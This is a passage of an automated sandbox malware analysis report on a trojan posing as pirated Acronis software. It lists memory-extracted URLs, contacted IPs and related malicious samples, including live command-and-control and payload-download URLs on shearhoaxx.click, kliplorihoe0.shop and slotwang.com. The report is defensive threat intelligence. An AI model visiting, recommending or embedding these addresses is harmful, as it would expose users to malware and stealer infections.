                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.msn.com/webservices/spaces/v1/GetXmlFeedLouserzedConfig/ContactCard/GetXmlFeedRpsUrlmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                            high
                                                                                            https://certs.securetrust.com/CA0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://config.messenger.msn.com/config/MsgrConfig.asmxmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.certum.pl/CPS0V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://slotwang.com/file/Panorado.exeo%Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://cevcsca2021.ocsp-certum.com07V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://kliptedehoa.shoppowershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.hotmail.msn.com/ws/2004/09/oim/rsimsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                            unknown
                                                                                                            https://slotwang.com/3Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://kliplorihoe0.shop/int_clp_ldr_pan.txtVPalestine.com, 0000001F.00000002.2387321620.00000000015DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://crl.certum.pl/ctnca.crl0kV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/scmsn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.entrust.net/rpa03V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://shearhoaxx.click/api)5Palestine.com, 00000011.00000002.2040719422.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2002/07/utilitymsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.macromedia.com/go/getflashplayer/msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                high
                                                                                                                                https://contoso.com/Iconpowershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.autoitscript.com/autoit3/XPalestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000000.1281744220.0000000000BC5000.00000002.00000001.01000000.00000009.sdmp, electronics.exe, 00000043.00000000.2223887416.0000000000345000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://ocsp.rootca1.amazontrust.com0:Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0wV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://nsis.sf.net/NSIS_ErrorErroracronis recovery expert deluxe 1.0.0.132.rarl.exe, 00000001.00000000.1249820381.0000000000409000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://shearhoaxx.click:443/apiPalestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://www.ecosia.org/newtab/Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://rsi.hotmail.com/rsi/rsi.asmxmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.gnu.org/licenses/lgpl-2.1.htmlFV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brPalestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiPalestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://libusb.infoV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.acronis.com/VV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://slotwang.com/IPalestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://g.msn.commsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtdV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://shearhoaxx.click/KPalestine.com, 00000011.00000003.1563852237.00000000048BF000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1560361265.00000000048B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.info-zip.org/msn.exe, 00000027.00000002.2156116548.00000000096F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://kliplorihoe0.shop/int_clp_ldr_pan.txt(Palestine.com, 00000011.00000002.2032778211.0000000001CA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trustmsn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ows.messenger.msn.com/OimWS/oim.asmxmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://ocsp.securetrust.com/0?Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://kliplorihoe0.shop:443/int_clp_ldr_pan.txt1Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://messenger.msn.com/ct/getappcompat.aspx?lcid=%smsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://www.inkscape.org/namespaces/inkscapeV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://crl.entrust.net/2048ca.crl0V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.entrust.net/rpa0V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://repository.certum.pl/ctsca2021.cer0AV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://crl.certum.pl/ctsca2021.crl0oV2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://ocsp.vikingcloud.com/0APalestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://ocsp.entrust.net03V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://ocsp.entrust.net02V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://certs.securetrust.com/issuers/TWGCA.crt0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://ocsp.vikingcloud.com/0:Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://slotwang.com:443/file/Panorado.exePalestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://contoso.com/Licensepowershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://schemas.xmlsoap.org/soap/envelope/msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp, msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://slotwang.com/Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://github.com/Pester/Pesterdpowershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://aka.ms/pscore6powershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgPalestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://repository.certum.pl/cevcsca2021.cer0V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  172.67.129.49
                                                                                                                                                                                                                                  shearhoaxx.clickUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                  172.67.182.135
                                                                                                                                                                                                                                  kliplorihoe0.shopUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  45.66.248.134
                                                                                                                                                                                                                                  slotwang.comRussian Federation
                                                                                                                                                                                                                                  53356FREERANGECLOUDCAfalse
                                                                                                                                                                                                                                  104.21.35.89
                                                                                                                                                                                                                                  kliptedehoa.shopUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1579835
                                                                                                                                                                                                                                  Start date and time:2024-12-23 10:34:26 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 11m 21s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:73
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Sample name:acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@108/207@6/4
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  04:35:06API Interceptor2x Sleep call for process: acronis recovery expert deluxe 1.0.0.132.rarl.exe modified
                                                                                                                                                                                                                                  04:35:30API Interceptor19x Sleep call for process: Palestine.com modified
                                                                                                                                                                                                                                  04:35:51API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                  04:36:35API Interceptor1x Sleep call for process: 5RLYIRN4B2NNKHJ11UTSZ2.tmp modified
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  172.67.129.49https://uspslkj.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    http://uspslkj.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      172.67.182.135BDxsBr8Dce.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        kliplorihoe0.shopBDxsBr8Dce.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.182.135
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        CLOUDFLARENETUSrTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                        • 172.67.177.134
                                                                                                                                                                                                                                        https://www.google.com.au/url?q=//www.google.co.nz/amp/s/synthchromal.ru/Vc51/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.67.154.63
                                                                                                                                                                                                                                        https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.92.223
                                                                                                                                                                                                                                        FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 1.8.230.191
                                                                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                                                                        FREERANGECLOUDCAvQu0zndLpi.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 45.66.248.99
                                                                                                                                                                                                                                        vQu0zndLpi.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 45.66.248.99
                                                                                                                                                                                                                                        jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 216.24.208.32
                                                                                                                                                                                                                                        Jaws.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                        • 45.66.248.237
                                                                                                                                                                                                                                        Setup-Pro.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        • 45.66.249.162
                                                                                                                                                                                                                                        forest.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 45.66.249.249
                                                                                                                                                                                                                                        forest.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 45.66.249.249
                                                                                                                                                                                                                                        arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                        • 23.129.35.4
                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.PWS.Siggen3.33653.31886.3628.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                                                                        • 193.142.147.59
                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.PackedNET.2334.3801.19434.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, SmokeLoaderBrowse
                                                                                                                                                                                                                                        • 193.142.147.59
                                                                                                                                                                                                                                        CLOUDFLARENETUSrTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                        • 172.67.177.134
                                                                                                                                                                                                                                        https://www.google.com.au/url?q=//www.google.co.nz/amp/s/synthchromal.ru/Vc51/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.67.154.63
                                                                                                                                                                                                                                        https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.92.223
                                                                                                                                                                                                                                        FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 1.8.230.191
                                                                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eArchivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
                                                                                                                                                                                                                                        lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.35.89
